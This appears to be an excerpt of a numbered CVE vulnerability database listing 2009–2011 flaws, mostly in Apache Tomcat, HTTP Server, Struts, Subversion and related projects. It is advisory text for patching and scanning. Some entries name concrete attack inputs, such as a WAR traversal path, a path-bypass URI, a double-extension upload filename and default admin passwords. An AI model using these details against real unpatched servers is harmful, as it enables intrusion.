4856| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
4857| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
4858| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
4859| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
4860| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
4861| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
4862| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
4863| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
4864| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
4865| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
4866| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
4867| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
4868| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
4869| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
4870| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
4871| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
4872| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
4873| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
4874| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
4875| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
4876| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
4877| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
4878| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
4879| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
4880| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
4881| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
4882| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
4883| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
4884| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
4885| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
4886| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
4887| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
4888| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
4889| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
4890| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
4891| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
4892| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
4893| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
4894| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
4895| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
4896| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
4897| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
4898| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
4899| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
4900| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
4901| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
4902| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
4903| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
4904| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
4905| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
4906| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
4907| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
4908| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
4909| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
4910| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
4911| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
4912| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
4913| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
4914| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
4915| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
4916| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
4917| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
4918| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
4919| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
4920| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
4921| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
4922| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
4923| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
4924| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
4925| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
4926| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
4927| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
4928| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
4929| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
4930| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
4931| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
4932| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
4933| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
4934| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
4935| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
4936| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
4937| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
4938| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
4939| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
4940| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
4941| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
4942| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
4943| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
4944| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
4945| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
4946| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
4947| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
4948| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
4949| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
4950| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
4951| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
4952| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
4953| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
4954| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
4955| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
4956| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
4957| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
4958| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
4959| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
4960| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
4961| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
